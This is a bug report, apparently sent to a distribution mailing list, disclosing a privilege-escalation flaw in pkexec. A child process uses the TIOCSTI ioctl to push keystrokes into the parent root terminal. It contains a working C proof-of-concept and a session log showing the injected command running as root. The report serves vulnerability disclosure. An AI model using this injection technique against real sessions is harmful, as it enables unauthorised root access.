Package: policykit-1
Version: all
Severity: important
File: /usr/bin/pkexec

When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation. This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in "sudo" by using the "use_pty" flag.

$ cat test.c
#include <sys/ioctl.h>

int main()
{
 char *cmd = "id\n";
 while(*cmd)
  ioctl(0, TIOCSTI, cmd++);
}

$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)

# pkexec --user saken ./test ----> last command i type in
id
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)


I don't believe any of the previous mentions of fixes for "su" and "sudo" work here, since executing a shell via pkexec would make it not have job control.

I'm also requesting a CVE for this issue

Thanks,
Federico Bento

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Reply via email to